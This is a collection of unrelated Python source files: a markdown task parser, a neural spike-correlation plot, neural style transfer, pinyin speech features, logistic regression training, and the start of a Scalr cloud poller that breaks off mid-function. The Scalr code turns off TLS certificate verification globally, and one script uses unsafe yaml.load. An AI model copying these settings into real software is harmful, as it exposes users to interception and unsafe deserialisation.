                    parent=task,
                )
                task.subtasks.append(subtask)
                # reset the last dataset
                dataset = None
            # Dataset definition
            if header.tag == "h3" and "Table of content" not in header.text:
                if task is None:
                    logger.error(
                        "Unexpected dataset without a parent task at: %s",
                        header.text,
                    )
                    # Fix: skip instead of crashing on task.datasets below.
                    continue
                tables = [t for t in section if t.tag == "table"]
                n_tables = len(tables)
                if n_tables < 2:
                    # Zero or one table: a simple dataset (optionally with SOTA).
                    text = Text.parse(paragraphs)
                    dataset = Dataset(
                        name=header.text.strip().strip(":"),
                        description=text.text,
                        links=text.links,
                    )
                    if n_tables == 1:
                        dataset.sota = parse_sota(tables[0])
                else:
                    # Multiple tables: treat each (preceding paragraph, table)
                    # pair as a subdataset; everything else is the description.
                    table_idxs = [
                        i for i, el in enumerate(section) if el.tag == "table"
                    ]
                    pairs = []
                    for idx in table_idxs:
                        if idx >= 2 and section[idx - 1].tag == "p":
                            pairs.append((section[idx - 1], section[idx]))
                    description_idxs = set(range(1, len(section))) - set(
                        table_idxs
                    )
                    description_ps = [
                        el
                        for i, el in enumerate(section)
                        if i in description_idxs
                    ]
                    text = Text.parse(description_ps)
                    dataset = Dataset(
                        name=header.text.strip().strip(":"),
                        description=text.text,
                        links=text.links,
                    )
                    dataset.subdatasets = parse_subdatasets(
                        parent=dataset, pairs=pairs
                    )
                if subtask is not None:
                    # we are in a subtask, add everything here
                    subtask.datasets.append(dataset)
                else:
                    task.datasets.append(dataset)
        if task:
            self.parsed.append(task)
class Markdown(markdown.Markdown):
    """markdown.Markdown preconfigured with table support and the SOTA
    ParserProcessor; after conversion, ``self.parser_processor.parsed``
    holds the extracted tasks."""
    def __init__(self):
        super().__init__(extensions=[TableExtension()])
        self.parser_processor = ParserProcessor(self)
        # Registered with priority 1 -- presumably so it runs after the
        # built-in tree processors (incl. tables); TODO confirm against the
        # markdown registry documentation.
        self.treeprocessors.register(
            self.parser_processor, "parser_processor", 1
        )
def parse_file(filename: str) -> TaskDB:
    """Parse an NLP-Progress markdown file and return a TaskDB instance.

    The rendered HTML output is discarded (written to /dev/null); only the
    tasks collected by the tree processor are kept, run through fix_task
    and loaded into the returned TaskDB.
    """
    parser = Markdown()
    with io.open("/dev/null", "wb") as sink:
        parser.convertFile(filename, output=sink)
    taskdb = TaskDB()
    for parsed_task in parser.parser_processor.parsed:
        for fixed in fix_task(parsed_task):
            taskdb.add_task(fixed)
    return taskdb
|
<filename>code/analysis/plot_mean_activity_correlations.py<gh_stars>1-10
import matplotlib
matplotlib.use('Agg')
import numpy as np
from scipy.stats import alpha
from scipy.stats import pearsonr
import pylab as pl
import seaborn
import sys
import json
import yaml
sys.path.append("code/striatal_model")
import params
from colors import colors
from plot_tools2 import *
# --- Command-line arguments --------------------------------------------------
spikes_fn = sys.argv[1]      # spike raster file (columns: sender id, spike time)
channels_fn = sys.argv[2]    # JSON file listing per-channel d1/d2 neuron ids
experiment_fn = sys.argv[3]  # YAML experiment configuration
hemisphere = sys.argv[4]     # hemisphere selector for the stimulation times
out_fn = sys.argv[5]         # output figure filename
# spike data of the channels
data = np.loadtxt(spikes_fn)
senders = data[:, 0]
unique_senders = np.unique(senders)  # all active senders
times = data[:, 1]
with open(channels_fn, "r+") as f:
    channels = json.load(f)
    channels = channels['channels']
with open(experiment_fn, "r+") as f:
    # NOTE(review): yaml.load without an explicit Loader is unsafe on
    # untrusted input; consider yaml.safe_load.
    cfg = yaml.load(f)
# Stimulation windows (start/stop times) for the chosen hemisphere.
stim_times_start, stim_times_stop = get_stim_times(
    cfg, hemisphere, params, mask=False)
# Flatten D1/D2 neuron ids across channels and collect their spike times.
all_d1 = np.ravel([c['d1'] for c in channels])
all_d2 = np.ravel([c['d2'] for c in channels])
spikes_d1 = np.hstack([times[np.where(senders == nid)[0]] for nid in all_d1])
spikes_d2 = np.hstack([times[np.where(senders == nid)[0]] for nid in all_d2])
# Split spikes into stimulation vs background epochs.
# `transient_duration` presumably comes from the plot_tools2 star import --
# TODO confirm.
spikes_d1_stim = np.array([])
spikes_d2_stim = np.array([])
spikes_d1_bckgrnd = np.array([])
spikes_d2_bckgrnd = np.array([])
for i, t in enumerate(spikes_d1):
    for boundaries in zip(stim_times_start, stim_times_stop):
        if t >= boundaries[0] + transient_duration and t < boundaries[1]:
            spikes_d1_stim = np.append(spikes_d1_stim, t)
for i, t in enumerate(spikes_d2):
    for boundaries in zip(stim_times_start, stim_times_stop):
        if t >= boundaries[0] + transient_duration and t < boundaries[1]:
            spikes_d2_stim = np.append(spikes_d2_stim, t)
for i, t in enumerate(spikes_d1):
    for boundaries in zip(stim_times_start, stim_times_stop):
        if t < boundaries[0] or t >= boundaries[1] + transient_duration:
            spikes_d1_bckgrnd = np.append(spikes_d1_bckgrnd, t)
for i, t in enumerate(spikes_d2):
    for boundaries in zip(stim_times_start, stim_times_stop):
        if t < boundaries[0] or t >= boundaries[1] + transient_duration:
            spikes_d2_bckgrnd = np.append(spikes_d2_bckgrnd, t)
# Accumulators: mean cross-correlation (and std) between the D1 and D2
# population rate histograms per bin size, for stimulation and background
# epochs, plus shuffled controls.
cc_all = []
cc_stim = []
cc_stim_var = []
cc_stim_shuff = []
cc_stim_shuff_var = []
cc_bckgrnd = []
cc_bckgrnd_var = []
cc_bckgrnd_shuff = []
cc_bckgrnd_shuff_var = []
binsizes = np.linspace(10, 600, 30)
for binsize in binsizes:
    # runtime for correlations is 10 times longer
    bins = np.arange(0, int(params.runtime) * 10, binsize)
    # Partition bin edges into stimulation vs background windows.
    stim_bins = np.array([])
    bckgrnd_bins = np.array([])
    for t in bins:
        for boundaries in zip(stim_times_start, stim_times_stop):
            if t >= boundaries[0] and t < boundaries[1]:
                stim_bins = np.append(stim_bins, t)
    bckgrnd_bins = np.array([b for b in bins if not b in stim_bins])
    # Population rate histograms, normalized to spikes/sec per neuron.
    hist_d1 = np.histogram(spikes_d1, bins=bins)[0].astype(
        'float') * 1000. / (binsize * len(all_d1))
    hist_d2 = np.histogram(spikes_d2, bins=bins)[0].astype(
        'float') * 1000. / (binsize * len(all_d2))
    hist_d1_stim = np.histogram(spikes_d1_stim, bins=stim_bins)[
        0].astype('float') * 1000. / (binsize * len(all_d1))
    hist_d2_stim = np.histogram(spikes_d2_stim, bins=stim_bins)[
        0].astype('float') * 1000. / (binsize * len(all_d2))
    hist_d1_bckgrnd = np.histogram(spikes_d1_bckgrnd, bins=bckgrnd_bins)[
        0].astype('float') * 1000. / (binsize * len(all_d1))
    hist_d2_bckgrnd = np.histogram(spikes_d2_bckgrnd, bins=bckgrnd_bins)[
        0].astype('float') * 1000. / (binsize * len(all_d2))
    # split the histograms into 3 parts, to have 3 data points for corrcoef
    hist_d1_bckgrnd_split = np.array_split(hist_d1_bckgrnd, 3)
    hist_d2_bckgrnd_split = np.array_split(hist_d2_bckgrnd, 3)
    # NOTE(review): both branches assign split_num = 3, so this conditional
    # is currently dead code (kept with its original comment).
    if experiment_fn == 'sequences.yaml' or experiment_fn == 'sequencesd1d2.yaml' or experiment_fn == 'competingActions.yaml':
        split_num = 3
    else:
        split_num = 3  # Too short sequences for sequences<x>.yaml
    hist_d1_stim_split = np.array_split(hist_d1_stim, split_num)
    hist_d2_stim_split = np.array_split(hist_d2_stim, split_num)
    # Correlate D1 vs D2 rates within each split, then take mean/std.
    cc_bck_split = []
    for x, y in zip(hist_d1_bckgrnd_split, hist_d2_bckgrnd_split):
        cc_bck_split.append(correlate2(x, y)[1, 0])
    cc_stim_split = []
    for x, y in zip(hist_d1_stim_split, hist_d2_stim_split):
        cc_stim_split.append(correlate2(x, y)[1, 0])
    cc_all.append(correlate2(hist_d1, hist_d2)[1, 0])
    cc_stim.append(np.mean(cc_stim_split))
    cc_stim_var.append(np.std(cc_stim_split))
    cc_bckgrnd.append(np.mean(cc_bck_split))
    cc_bckgrnd_var.append(np.std(cc_bck_split))
    # Shuffled controls: destroy temporal structure while keeping the rate
    # distribution, to estimate the chance correlation level.
    hist_d1_stim_shuf = np.copy(hist_d1_stim)
    hist_d2_stim_shuf = np.copy(hist_d2_stim)
    hist_d1_bckgrnd_shuf = np.copy(hist_d1_bckgrnd)
    hist_d2_bckgrnd_shuf = np.copy(hist_d2_bckgrnd)
    temp_stim = []
    temp_bckgrnd = []
    # NOTE(review): xrange makes this Python 2 only.
    for x in xrange(10):  # 10 trials
        np.random.shuffle(hist_d1_stim_shuf)
        np.random.shuffle(hist_d2_stim_shuf)
        np.random.shuffle(hist_d1_bckgrnd_shuf)
        np.random.shuffle(hist_d2_bckgrnd_shuf)
        temp_stim.append(correlate2(
            hist_d1_stim_shuf, hist_d2_stim_shuf)[1, 0])
        temp_bckgrnd.append(correlate2(
            hist_d1_bckgrnd_shuf, hist_d2_bckgrnd_shuf)[1, 0])
    cc_stim_shuff.append(np.mean(temp_stim))
    cc_stim_shuff_var.append(np.std(temp_stim))
    cc_bckgrnd_shuff.append(np.mean(temp_bckgrnd))
    cc_bckgrnd_shuff_var.append(np.std(temp_bckgrnd))
# --- Figure: population rates (top) and cross-correlations (bottom) ----------
fig = pl.figure(0, figsize=[16, 10])
ax = fig.add_subplot(2, 1, 1)
# NOTE(review): these histograms come from the LAST binsize iteration above.
ax.plot(np.arange(len(hist_d1)) / (1000. / binsize), hist_d1, label='D1')
ax.plot(np.arange(len(hist_d2)) / (1000. / binsize), hist_d2, label='D2')
ax.set_ylabel("Mean activity (spikes/sec)", fontsize=20, fontweight='bold')
ax.set_xlabel("Time (s)", fontsize=20, fontweight='bold')
ax.legend(prop={'size': 15, 'weight': 'bold'}, loc='best')
for x in ax.get_xticklabels():
    x.set_fontweight('bold')
    x.set_fontsize(14)
for x in ax.get_yticklabels():
    x.set_fontweight('bold')
    x.set_fontsize(14)
# Bottom panel: correlation vs bin size with +-1 std shaded bands.
ax = fig.add_subplot(2, 1, 2)
ax.plot(binsizes, cc_stim, '.-', label='stimulation',
        color=colors[1], markersize=20.)
ax.fill_between(binsizes, np.array(cc_stim) - np.array(cc_stim_var),
                np.array(cc_stim) + np.array(cc_stim_var), color=colors[1], alpha=0.2)
ax.plot(binsizes, cc_stim_shuff, '.--', label='stimulation-shuffled',
        color=colors[2], markersize=20.)
ax.fill_between(binsizes, np.array(cc_stim_shuff) - np.array(cc_stim_shuff_var),
                np.array(cc_stim_shuff) + np.array(cc_stim_shuff_var), color=colors[2], alpha=0.2)
ax.plot(binsizes, cc_bckgrnd, '.-', label='background',
        color=colors[3], markersize=20.)
ax.fill_between(binsizes, np.array(cc_bckgrnd) - np.array(cc_bckgrnd_var),
                np.array(cc_bckgrnd) + np.array(cc_bckgrnd_var), color=colors[3], alpha=0.2)
ax.plot(binsizes, cc_bckgrnd_shuff, '.--',
        label='background-shuffled', color=colors[4], markersize=20.)
ax.fill_between(binsizes, np.array(cc_bckgrnd_shuff) - np.array(cc_bckgrnd_shuff_var),
                np.array(cc_bckgrnd_shuff) + np.array(cc_bckgrnd_shuff_var), color=colors[4], alpha=0.2)
ax.set_xlabel("Bin size (ms)", fontsize=20, fontweight='bold')
ax.set_ylabel("Average cross correlation", fontsize=20, fontweight='bold')
ax.legend(prop={'size': 15, 'weight': 'bold'}, loc='best')
for x in ax.get_xticklabels():
    x.set_fontweight('bold')
    x.set_fontsize(14)
for x in ax.get_yticklabels():
    x.set_fontweight('bold')
    x.set_fontsize(14)
pl.savefig(out_fn)
|
<reponame>kbhartiya/NeuralPrisma<filename>nst.py
import tensorflow as tf
import numpy as np
import os
import sys
import scipy.io
import scipy.misc
import matplotlib.pyplot as plt
from PIL import Image
from nst_utils import *
import warnings; warnings.filterwarnings("ignore")
def compute_content_cost(a_C, a_G):
    """
    Content cost between content-image and generated-image activations.

    Arguments:
    a_C -- tensor (1, n_H, n_W, n_C), hidden-layer activations for image C
    a_G -- tensor (1, n_H, n_W, n_C), hidden-layer activations for image G

    Returns:
    J_content -- scalar tensor, sum of squared activation differences
                 scaled by 1 / (4 * n_H * n_W * n_C)
    """
    _, n_H, n_W, n_C = a_G.get_shape().as_list()
    # flatten both activation volumes into 1-D vectors
    flat_C = tf.transpose(tf.reshape(a_C, [-1]))
    flat_G = tf.transpose(tf.reshape(a_G, [-1]))
    denom = n_H * n_W * n_C
    return 0.25 * (1 / denom) * tf.reduce_sum((flat_C - flat_G) ** 2)
def gram_matrix(A):
    """
    Style (Gram) matrix of A.

    Argument:
    A -- matrix of shape (n_C, n_H*n_W)

    Returns:
    A @ A^T, the (n_C, n_C) Gram matrix of channel correlations
    """
    return tf.matmul(A, tf.transpose(A))
def compute_style_layer_cost(a_S, a_G):
    """
    Style cost contributed by one layer.

    Both activation tensors are unrolled to (n_C, n_H*n_W); the squared
    difference of their Gram matrices is normalized by
    4 * n_C^2 * (n_H*n_W)^2.

    Arguments:
    a_S -- tensor (1, n_H, n_W, n_C), activations for the style image
    a_G -- tensor (1, n_H, n_W, n_C), activations for the generated image

    Returns:
    style_layer_cost -- scalar tensor
    """
    _, n_H, n_W, n_C = a_G.get_shape().as_list()
    area = n_H * n_W
    # unroll to (n_C, n_H*n_W) so channels index the Gram matrix
    style_mat = tf.transpose(tf.reshape(a_S, [area, n_C]))
    gen_mat = tf.transpose(tf.reshape(a_G, [area, n_C]))
    gram_diff = gram_matrix(style_mat) - gram_matrix(gen_mat)
    return tf.reduce_sum(gram_diff ** 2) / (4 * (n_C) ** 2 * (area) ** 2)
def compute_style_cost(model, style_layers, sess):
    """
    Weighted sum of per-layer style costs.

    For each (layer_name, coefficient) pair, the layer's activations are
    evaluated once in *sess* (expected: the style image has already been
    assigned to model['input']) while the generated-image activations stay
    symbolic.

    Arguments:
    model -- dict-like VGG19 model mapping layer names to tensors
    style_layers -- list of (layer_name, coefficient) tuples
    sess -- TensorFlow session used to evaluate style activations

    Returns:
    J_style -- scalar tensor, the accumulated weighted style cost
    """
    total = 0
    for layer_name, coeff in style_layers:
        layer_out = model[layer_name]
        style_activations = sess.run(layer_out)  # concrete style values
        total += coeff * compute_style_layer_cost(style_activations, layer_out)
    return total
def total_cost(J_content, J_style, alpha=10, beta=40):
    """
    Total neural-style-transfer cost: alpha * J_content + beta * J_style.

    Bug fix: the defaults were ``alpha=None, beta=None``, so calling
    without explicit weights raised ``TypeError`` (``None * J_content``).
    The defaults now follow the conventional NST weighting (alpha=10,
    beta=40); callers passing explicit weights are unaffected.

    Arguments:
    J_content -- content cost (scalar)
    J_style -- style cost (scalar)
    alpha -- weight of the content cost
    beta -- weight of the style cost

    Returns:
    the weighted total cost (same type as the inputs)
    """
    return alpha * J_content + beta * J_style
# --- Build the TF1 graph for style transfer (module-level script) ---
# Reset any graph left over from a previous run.
tf.reset_default_graph()
# TF1-style interactive session (original note: "error may occur so be careful").
sess = tf.InteractiveSession()
# Load and preprocess the content image.
# NOTE(review): scipy.misc.imread was removed in SciPy >= 1.2 -- confirm the
# pinned SciPy version, or switch to imageio.imread.
content_image = scipy.misc.imread("/images/contentsample.jpg")
content_image = reshape_and_normalize(content_image)
# Load and preprocess the style image.
style_image = scipy.misc.imread("/images/stylesample.jpg")
style_image = reshape_and_normalize(style_image)
# Starting point for optimization: the content image plus noise.
generate_image = generate_noise_image(content_image)
# Load the pretrained VGG19 weights into a dict of layer tensors.
model = load_vgg_model("vggmodel/imagenet-vgg-verydeep-19.mat")
# Feed the content image and capture the 'conv4_2' activations for it.
sess.run(model['input'].assign(content_image))
out = model['conv4_2']
a_C = sess.run(out)   # concrete activations of the content image
a_G = out             # symbolic activations of whatever is in model['input']
# Content cost between the fixed content activations and the generated image.
J_content = compute_content_cost(a_C, a_G)
# Layers (and weights) contributing to the style cost.
STYLE_LAYERS = [('conv1_1', 0.1),('conv2_1', 0.1),('conv3_1', 0.1),('conv4_1', 0.3),('conv5_1', 0.4)]
# Feed the style image, then build the style cost from its activations.
sess.run(model['input'].assign(style_image))
J_style = compute_style_cost(model, STYLE_LAYERS, sess)
# Weighted total cost and the Adam optimizer minimizing it.
J = total_cost(J_content, J_style, alpha=10, beta=50)
optimizer = tf.train.AdamOptimizer(0.001)
train = optimizer.minimize(J)
def model_nn(sess, input_image, num_iterations):
    """
    Run the optimization loop that morphs *input_image* to minimize J.

    Arguments:
    sess -- TensorFlow session
    input_image -- initial (noisy) image assigned to model['input']
    num_iterations -- number of optimizer steps to run

    Returns:
    generated_image -- the final generated image (numpy array)

    Bug fixes vs. the original:
      * tf.global_variable_initializer -> tf.global_variables_initializer
        (the original name does not exist and raised AttributeError)
      * ``if i%20:`` printed/saved on every iteration EXCEPT multiples of
        20; ``i % 20 == 0`` reports every 20th iteration as intended
      * rebinding J / J_content / J_style inside the function made them
        locals, raising UnboundLocalError on the first sess.run; fetch
        into fresh local names instead
      * ``return generated_images`` was a NameError (typo)
      * generated_image is initialized so the final save works even when
        num_iterations == 0
    """
    sess.run(tf.global_variables_initializer())
    # Feed the starting image into the VGG input variable.
    sess.run(model['input'].assign(input_image))
    generated_image = input_image
    for i in range(num_iterations):
        sess.run(train)
        # The current generated image lives in the model's input variable.
        generated_image = sess.run(model['input'])
        if i % 20 == 0:
            total_j, content_j, style_j = sess.run([J, J_content, J_style])
            print("Total Cost: {}".format(total_j))
            print("Total Content Cost: {}".format(content_j))
            print("Total Style Cost: {}".format(style_j))
            save_image('./output/generated_image_no'+str(i)+'.png', generated_image)
    save_image("./output/final_generated_image.jpg", generated_image)
    return generated_image
|
################################################################################
# Author: BigBangEpoch <<EMAIL>>
# Date : 2018-12-24
# Copyright (c) 2018-2019 BigBangEpoch All rights reserved.
################################################################################
from cute.common.mapper import pinyin_mapper
from cute.common.mapper import ph_dur_mapper
import numpy as np
def separate_phoneme_tone(pinyin_str):
    """
    Split a pinyin token into (phoneme, tone).

    The tone is the trailing digit when present, otherwise 0.

    :param pinyin_str: pinyin token such as 'wan3', 'ai2' or 'h'
    :return: (phoneme str, tone int)

    Examples:
        separate_phoneme_tone('wan3') -> ('wan', 3)
        separate_phoneme_tone('ai2')  -> ('ai', 2)
        separate_phoneme_tone('h')    -> ('h', 0)
    """
    tail = pinyin_str[-1]
    if tail.isdigit():
        return pinyin_str[:-1], int(tail)
    return pinyin_str, 0


def pinyin_to_phoneme_list(pinyin_str, pinyin_parser):
    """
    Convert a whitespace-separated pinyin string into a flat phoneme list.

    Punctuation tokens (',' and '.') become the short-pause marker 'sp1'.
    Every other token is looked up in *pinyin_parser* as a
    (consonant, vowel) pair; the tone digit is appended to the vowel, or
    to the consonant when the pinyin has no vowel part.

    :param pinyin_str: e.g. 'ka2 er2 pu3 pei2 wai4 sun1 , wan2 hua2 ti1'
    :param pinyin_parser: map from pinyin to (consonant, vowel)
    :return: list of phoneme strings, e.g.
        ['k','a2','er2','p','u3','p','ei2','uai4','s','uen1','sp1','uan2','h','ua2','t','i1']
    """
    phonemes = []
    for token in pinyin_str.split():
        if token in (',', '.'):
            phonemes.append('sp1')
            continue
        base, tone = separate_phoneme_tone(token)   # 'sun1' -> ('sun', 1)
        assert base in pinyin_parser, '%s not found.' % base
        consonant, vowel = pinyin_parser[base]      # 'sun' -> ('s', 'uen')
        if vowel == '':
            phonemes.append(consonant + str(tone))
        else:
            phonemes.extend([consonant, vowel + str(tone)])
    return phonemes
def eval_phoneme_duration(phoneme_list, phoneme_dur_parser):
    """
    Attach a frame duration to each phoneme.

    :param phoneme_list: list of phoneme strings
    :param phoneme_dur_parser: map holding a 'duration' table whose entry
        for a phoneme is indexable, with the duration at index 1
    :return: list of (phoneme, duration) pairs

    Example:
        input:  ['k', 'a2', 'er2', 'p', 'u3', 'p', 'ei2', 'uai4']
        output: [('k', 18), ('a2', 32), ('er2', 40), ('p', 19),
                 ('u3', 29), ('p', 19), ('ei2', 25), ('uai4', 38)]
    """
    durations = phoneme_dur_parser['duration']
    paired = []
    for ph in phoneme_list:
        assert ph in durations, '%s not found.' % ph
        paired.append((ph, int(durations[ph][1])))
    return paired
def phoneme_to_feature_matrix(phoneme_dur_list, phoneme_dur_parser, feat_type='two_hot', min_val=0.01, max_val=0.99):
    """
    Expand (phoneme, duration) pairs into a per-frame feature matrix.

    Each phoneme contributes `duration` identical frames. A frame is
    either a one-hot row over the phoneme-duration table ('one_hot') or
    a two-hot row over phoneme set + tone set ('two_hot').

    :param phoneme_dur_list: list of (phoneme, duration) pairs
    :param phoneme_dur_parser: maps with 'duration', 'phone_set', 'tone_set'
    :param feat_type: 'one_hot' or 'two_hot'
    :param min_val: value written at inactive positions
    :param max_val: value written at active positions
    :return: np.float32 matrix of shape (num_frame, dim) where dim is the
        table size (one-hot) or |phone_set| + |tone_set| (two-hot)
    """
    assert feat_type in ['one_hot', 'two_hot']
    # repeat each phoneme once per frame of its duration
    frames = [ph for ph, dur in phoneme_dur_list for _ in range(dur)]
    num_frame = len(frames)
    if feat_type == 'one_hot':
        dur_map = phoneme_dur_parser['duration']
        feats = np.ones(shape=(num_frame, len(dur_map)), dtype=np.float32) * min_val
        for row, ph in enumerate(frames):
            feats[row][dur_map[ph][0]] = max_val
    else:
        phone_map = phoneme_dur_parser['phone_set']
        tone_map = phoneme_dur_parser['tone_set']
        dim = len(phone_map) + len(tone_map)
        feats = np.ones(shape=(num_frame, dim), dtype=np.float32) * min_val
        for row, frame in enumerate(frames):
            ph, tone = separate_phoneme_tone(frame)
            # one hot for the phoneme, one hot for the tone (offset block)
            feats[row][phone_map[ph]] = max_val
            feats[row][len(phone_map) + tone_map[str(tone)]] = max_val
    return feats
def pinyin_to_feature_matrix(pinyin_str, show=False):
    """
    Full pipeline: pinyin -> phonemes -> durations -> NN feature matrix.

    :param pinyin_str: whitespace-separated pinyin string
    :param show: when True, print intermediate results for debugging
    :return: feature matrix (np.float32)
    """
    phonemes = pinyin_to_phoneme_list(pinyin_str=pinyin_str, pinyin_parser=pinyin_mapper)
    with_durations = eval_phoneme_duration(phoneme_list=phonemes, phoneme_dur_parser=ph_dur_mapper)
    features = phoneme_to_feature_matrix(phoneme_dur_list=with_durations, phoneme_dur_parser=ph_dur_mapper)
    if show:
        print(phonemes)
        print(with_durations)
        print(features.shape)
    return features
def test():
    """Smoke-test the pipeline on a sample sentence, printing intermediates."""
    sample = 'ka2 er2 pu3 pei2 wai4 sun1 , wan2 hua2 ti1'
    pinyin_to_feature_matrix(pinyin_str=sample, show=True)


if __name__ == '__main__':
    test()
|
# -*- coding: utf-8 -*-
# -----------------------------------
# @CreateTime : 2020/3/20 0:49
# @Author : <NAME>
# @Email : <EMAIL>
# ------------------------------------
import sys, os
sys.path.insert(0, os.path.join(__file__, "../.."))
from core.dataloaders import DataLoader
from core.models import LogisticRegression
from core.common import *
import logging
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s [%(levelname)s] %(process)d %(name)s: %(message)s")
@calc_time
def train(model, train_data_loader):
    """
    Train *model* with mini-batches from *train_data_loader*.

    Stops after EPOCHS passes over the data, or earlier once MAX_ITERATIONS
    batches have been consumed. When the log level allows it, evaluates on
    the loader's validation split every LOG_INTERVAL batches.

    NOTE(review): reads module-level EPOCHS, MAX_ITERATIONS, LOG_LEVEL and
    LOG_INTERVAL, which are assigned in the __main__ block below -- confirm
    they are set before calling this from anywhere else.
    """
    # Model training
    logging.info("Start Training!")
    max_iterations = MAX_ITERATIONS
    for epoch in range(EPOCHS):
        for i, (X, Y) in enumerate(train_data_loader, 0):
            model.fit(X, Y)
            # periodic evaluation on the held-out validation split
            if LOG_LEVEL <= logging.DEBUG and (i+1) % LOG_INTERVAL == 0:
                eval_result = model.evaluate(model.predict(train_data_loader.X_to_valid), train_data_loader.Y_to_valid)
                logging.debug("epoch: [{}/{}], iter: [{}/{}], err: [{}/{}], acc: {:.2f}%, loss: {:.6f}".format(
                    (epoch+1), EPOCHS, i+1, len(train_data_loader),*eval_result.values()))
            max_iterations -= 1
            if max_iterations < 0:
                logging.info("Stopped training for reaching max iterations of {}".format(MAX_ITERATIONS))
                return
    else:
        # for-else: runs only when every epoch completed without the early return
        logging.info("Stopped training for reaching max epochs of {}".format(EPOCHS))
        return
@calc_time
def load_train_data():
    """
    Build a DataLoader for the training set and load its features/labels.

    Uses the module-level tuning constants (SHUFFLE, BATCH_SIZE,
    SELECT_RATIO, SPLIT_RATIO, ENABLE_MULTI_PROCESSES) set in __main__,
    plus the project-level train_data_path.
    """
    train_data_loader = DataLoader(
        shuffle=SHUFFLE, use_mp=ENABLE_MULTI_PROCESSES, batch_size=BATCH_SIZE,
        select_ratio=SELECT_RATIO, split_ratio=SPLIT_RATIO)
    train_data_loader.load_XY(train_data_path)
    return train_data_loader
@calc_time
def main():
    """
    End-to-end pipeline: load data, train logistic regression, predict on
    the test set, optionally evaluate, and persist the learned weights.
    """
    # Load the training set
    train_data_loader = load_train_data()
    # Initialize the model
    lr = LogisticRegression(lr=LR)
    lr.init_weight(train_data_loader.N_features)
    # Train the model
    train(lr, train_data_loader)
    # Load the prediction (test) set
    test_data_loader = DataLoader(use_mp=ENABLE_MULTI_PROCESSES)
    test_data_loader.load_X(test_data_path)
    # Predict and persist the predictions
    Y_pred = lr.predict(test_data_loader.X)
    lr.save_prediction(Y_pred, path=test_predict_path)
    # Evaluate (needs the answer file) and persist the weights
    if LOG_LEVEL <= logging.INFO:
        test_data_loader.load_Y(test_answer_path)
        test_result = lr.evaluate_data_loader(test_data_loader)
        logging.info("[TEST RESULT] err: [{}/{}], acc: {:.2f}%".format(*test_result.values()))
    lr.dump_weight(WEIGHTS_PATH)
if __name__ == '__main__':
    # Pick the log level per platform; WARNING avoids most logging overhead
    # (original note: WARNING suppresses most of the output cost).
    LOG_LEVEL = logging.DEBUG if 'win' in sys.platform else logging.WARNING
    # Whether to load files with multiple processes (original note: works
    # wonders on a 64-core Kunpeng machine).
    ENABLE_MULTI_PROCESSES = True
    SHUFFLE = True  # shuffle the order of the training data
    WEIGHTS_PATH = os.path.join(DATA_DIR, "w.pkl")
    SELECT_RATIO = 0.5
    SPLIT_RATIO = 0.9  # train/validation split ratio
    LOG_INTERVAL = 10
    MAX_ITERATIONS = 100000  # expected iterations: N_to_train / BS * Epochs
    EPOCHS = 1
    # NOTE(review): each block below overwrites LR/BATCH_SIZE/EPOCHS, so
    # only the LAST group takes effect; the earlier ones are kept as
    # experiment presets (original comments preserved verbatim below).
    """
    以下是SGD使用办法,BS=1,靠人品
    """
    # Preset: plain SGD (BS=1; luck-dependent).
    LR = 0.5
    BATCH_SIZE = 1
    EPOCHS = 1
    # MAX_ITERATIONS = 100000
    """
    以下是Mini-Batch SGD使用办法,BS=10,靠人品
    尝试:LR>=0.1, BS<=200,EPOCHS>=1
    """
    # Preset: mini-batch SGD (BS=10); try LR>=0.1, BS<=200, EPOCHS>=1.
    LR = 0.25
    BATCH_SIZE = 10
    EPOCHS = 5
    """
    大乱斗冠军参数(但线上并不够理想,在io、运算和算法上还有很大优化空间)
    """
    # Preset: contest-winning parameters (still suboptimal online; room to
    # optimize IO, computation and the algorithm).
    LR = 0.01
    BATCH_SIZE = 10
    EPOCHS = 10
    """
    如果追求准确率,建议:LR<=0.03, BS>=500, EPOCHS>=300
    可以得到较好的结果:[TEST RESULT] err: [302/2000], acc: 84.90%
    """
    # Preset: for accuracy, LR<=0.03, BS>=500, EPOCHS>=300 can reach e.g.
    # err [302/2000], acc 84.90% (per the original author's note).
    LR = 0.1
    BATCH_SIZE = 100
    EPOCHS = 1
    main()
|
<gh_stars>1-10
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013, 2014, 2015 Scalr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from gevent import monkey
monkey.patch_all()
import os
import sys
cwd = os.path.dirname(os.path.abspath(__file__))
scalrpy_dir = os.path.join(cwd, '..')
sys.path.insert(0, scalrpy_dir)
import ssl
import time
import uuid
import json
import socket
import gevent
import urllib2
import greenlet
import urlparse
import binascii
import StringIO
import boto.ec2
import boto.exception
import boto.ec2.regioninfo
import oauth2client.client
import libcloud.common.types
from libcloud.compute.types import Provider, NodeState
from libcloud.compute.providers import get_driver
import libcloud.security
libcloud.security.VERIFY_SSL_CERT = False
import httplib2
import googleapiclient
from googleapiclient.discovery import build
from oauth2client.service_account import ServiceAccountCredentials
from scalrpy.util import helper
from scalrpy.util import dbmanager
from scalrpy.util import analytics
from scalrpy.util import cryptotool
from scalrpy.util import application
from scalrpy import LOG
from scalrpy import exceptions
helper.patch_gevent()
app = None
os.environ['EC2_USE_SIGV4'] = 'TRUE'
# Thin wrappers around cloud SDK calls, wrapped in helper.retry so that
# transient network failures (urllib2.URLError / socket.timeout) are retried.
# NOTE(review): helper.retry(1, 5, ...) presumably means 1 retry after a 5s
# delay -- confirm against scalrpy.util.helper.
@helper.retry(1, 5, urllib2.URLError, socket.timeout)
def _libcloud_list_locations(driver):
    # List the locations/zones visible to a libcloud driver.
    return driver.list_locations()
@helper.retry(1, 5, urllib2.URLError, socket.timeout)
def _libcloud_list_nodes(driver):
    # List the nodes (instances) visible to a libcloud driver.
    return driver.list_nodes()
@helper.retry(1, 5, urllib2.URLError, socket.timeout)
def _ec2_get_only_instances(ec2conn):
    # Only *running* EC2 instances are relevant for the poller.
    return ec2conn.get_only_instances(filters={'instance-state-name': 'running'})
@helper.retry(1, 5, urllib2.URLError, socket.timeout)
def _libcloud_get_service_catalog(driver):
    # Keystone service catalog for an authenticated OpenStack driver.
    return driver.connection.get_service_catalog()
def _handle_exception(e, msg):
    """
    Log *msg* at a severity matching the exception type.

